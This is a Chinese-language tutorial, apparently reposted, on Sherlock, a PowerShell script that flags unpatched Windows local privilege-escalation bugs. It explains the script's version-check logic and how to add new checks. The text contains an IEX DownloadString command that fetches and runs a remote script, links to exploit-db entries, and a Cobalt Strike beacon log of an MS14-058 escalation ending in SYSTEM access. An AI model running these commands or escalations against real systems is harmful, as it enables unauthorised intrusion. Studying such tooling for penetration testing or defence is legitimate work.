Sherlock 是一个在 Windows 下用于本地提权的 PowerShell 脚本。
目前包含了以下漏洞:
- Import-Module Sherlock.ps1
- IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
- PS C:\Users\Administrator> Find-AllVulns
- Title : User Mode to Ring (KiTrap0D)
- MSBulletin : MS10-015
- CVEID : 2010-0232
- Link : https://www.exploit-db.com/exploits/11199/
- VulnStatus : Not supported on 64-bit systems
- Title : Task Scheduler .XML
- MSBulletin : MS10-092
- CVEID : 2010-3338, 2010-3888
- Link : https://www.exploit-db.com/exploits/19930/
- VulnStatus : Not Vulnerable
- Title : NTUserMessageCall Win32k Kernel Pool Overflow
- MSBulletin : MS13-053
- CVEID : 2013-1300
- Link : https://www.exploit-db.com/exploits/33213/
- VulnStatus : Not supported on 64-bit systems
- Title : TrackPopupMenuEx Win32k NULL Page
- MSBulletin : MS13-081
- CVEID : 2013-3881
- Link : https://www.exploit-db.com/exploits/31576/
- VulnStatus : Not supported on 64-bit systems
- Title : TrackPopupMenu Win32k Null Pointer Dereference
- MSBulletin : MS14-058
- CVEID : 2014-4113
- Link : https://www.exploit-db.com/exploits/35101/
- VulnStatus : Appears Vulnerable
- Title : ClientCopyImage Win32k
- MSBulletin : MS15-051
- CVEID : 2015-1701, 2015-2433
- Link : https://www.exploit-db.com/exploits/37367/
- VulnStatus : Appears Vulnerable
- Title : Font Driver Buffer Overflow
- MSBulletin : MS15-078
- CVEID : 2015-2426, 2015-2433
- Link : https://www.exploit-db.com/exploits/38222/
- VulnStatus : Not Vulnerable
- Title : 'mrxdav.sys' WebDAV
- MSBulletin : MS16-016
- CVEID : 2016-0051
- Link : https://www.exploit-db.com/exploits/40085/
- VulnStatus : Not supported on 64-bit systems
- Title : Secondary Logon Handle
- MSBulletin : MS16-032
- CVEID : 2016-0099
- Link : https://www.exploit-db.com/exploits/39719/
- VulnStatus : Appears Vulnerable
Appears Vulnerable 就是存在漏洞
- PS C:\Users\Administrator> elevate ms14-058 smb
- [*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
- [+] host called home, sent: 105015 bytes
- [+] received output:
- [*] Getting Windows version...
- [*] Solving symbols...
- [*] Requesting Kernel loaded modules...
- [*] pZwQuerySystemInformation required length 51216
- [*] Parsing SYSTEM_INFO...
- [*] 173 Kernel modules found
- [*] Checking module \SystemRoot\system32\ntoskrnl.exe
- [*] Good! nt found as ntoskrnl.exe at 0x0264f000
- [*] ntoskrnl.exe loaded in userspace at: 40000000
- [*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
- [*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
- [*] Registering class...
- [*] Creating window...
- [*] Allocating null page...
- [*] Getting PtiCurrent...
- [*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
- [*] Creating a fake structure at NULL...
- [*] Triggering vulnerability...
- [!] Executing payload...
- [+] host called home, sent: 204885 bytes
- [+] established link to child beacon: 192.168.56.105
- [+] established link to parent beacon: 192.168.56.105
- beacon> getuid
- [*] Tasked beacon to get userid
- [+] host called home, sent: 8 bytes
- [*] You are NT AUTHORITY\SYSTEM (admin)
可以发现提权成功,注意 Sherlock 只是验证,并不能帮助你直接进行利用。
除了上述的基本功能外,脚本里面还隐藏了一些作者没有介绍到的小功能
Sherlock 还可以让我们来获取软件的版本号,我们只需要运行
命令即可。
- Get-FileVersionInfo
演示:
运行
命令,我们就可以知道 CPU 的架构是 32 位还是 64 位的。
- Get-Architecture
演示:
Sherlock 除了作者已经加入的那些漏洞,我们还可以自己来加入感兴趣的漏洞。再添加漏洞之前,我们先来分析一下 Sherlock 漏洞验证的原理。
在 Sherlock 中,每一个漏洞验证模块都是一个
,具体形式如下:
- function
- function Find-MS16032 {
- }
然后使用
来获取系统版本,判断系统版本是否存在提权漏洞。符合再进行下一步判断。
- Get-Architecture
- if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" )
然后通过
获取存在漏洞的文件的版本信息,主要提取后面两段数字。
- Get-FileVersionInfo
然后就简单了,用一个 switch+if 对比版本就行了:
- switch ($Build) {
- 7600 {
- if ($Revision - ge "16000") {
- $VulnStatus = "Appears Vulnerable"
- }
- }
- 7601 {
- if ($Revision - le "23348") {
- $VulnStatus = "Appears Vulnerable"
- }
- }
- 9200 {
- if ($Revision - le "21768") {
- $VulnStatus = "Appears Vulnerable"
- }
- }
- 9600 {
- if ($Revision - le "18230") {
- $VulnStatus = "Appears Vulnerable"
- }
- }
- 10240 {
- if ($Revision - le "16724") {
- $VulnStatus = "Appears Vulnerable"
- }
- }
- 10586 {
- if ($Revision - le "162") {
- $VulnStatus = "Appears Vulnerable"
- }
- }
- default {
- $VulnStatus = "Not Vulnerable"
- }
- }
然后我们自己添加漏洞就简单了,在
中加入漏洞信息。
- function New-ExploitTable
测试一下,我们先来创建一个
:
- function Find-MS16135
- function Find-MS16135 {
- $MSBulletin = "MS16-135"
- $VulnStatus = "Appears Vulnerable"
- Set-ExploitTable $MSBulletin $VulnStatus
- }
然后在
中加入
- function Find-AllVulns
就 OK 啦。
- Find-MS16135
测试看看:
来源: http://www.tuicool.com/articles/UvEzYzb